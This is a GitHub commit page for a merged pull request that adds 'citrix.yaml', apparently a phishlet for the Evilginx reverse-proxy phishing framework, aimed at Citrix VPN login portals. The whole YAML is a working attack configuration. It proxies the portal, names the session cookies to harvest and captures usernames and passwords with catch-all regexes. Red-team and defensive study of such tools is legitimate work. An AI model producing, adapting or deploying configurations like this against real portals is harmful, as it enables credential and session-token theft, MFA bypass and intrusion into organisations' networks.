Skip to content

Commit

Permalink
Merge pull request kgretzky#72 from rvrsh3ll/master
Browse files Browse the repository at this point in the history
Create citrix.yaml
  • Loading branch information
kgretzky authored Oct 17, 2018
2 parents 1f906e0 + 2b50765 commit b61e1ba
Showing 1 changed file with 18 additions and 0 deletions.
18 changes: 18 additions & 0 deletions phishlets/citrix.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,18 @@
name: 'Citrix Portal'
author: '@424f424f'
min_ver: '2.1.0'
proxy_hosts:
- {phish_sub: 'subdomainhere', orig_sub: 'subdomainhere', domain: 'domainhere', session: true, is_landing: true}
sub_filters:
- {hostname: 'domainhere', sub: 'subdomainhere', domain: 'domainhere', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'application/json', 'application/javascript']}
auth_tokens:
- domain: 'domainhere'
keys: ['ASP.NET_SessionId','CsrfToken','NSC_AAAC','NSC_DLGE','pwcount']
user_regex:
key: 'login'
re: '(.*)'
pass_regex:
key: 'passwd'
re: '(.*)'
landing_path:
- '/vpn/index.html'

0 comments on commit b61e1ba

Please sign in to comment.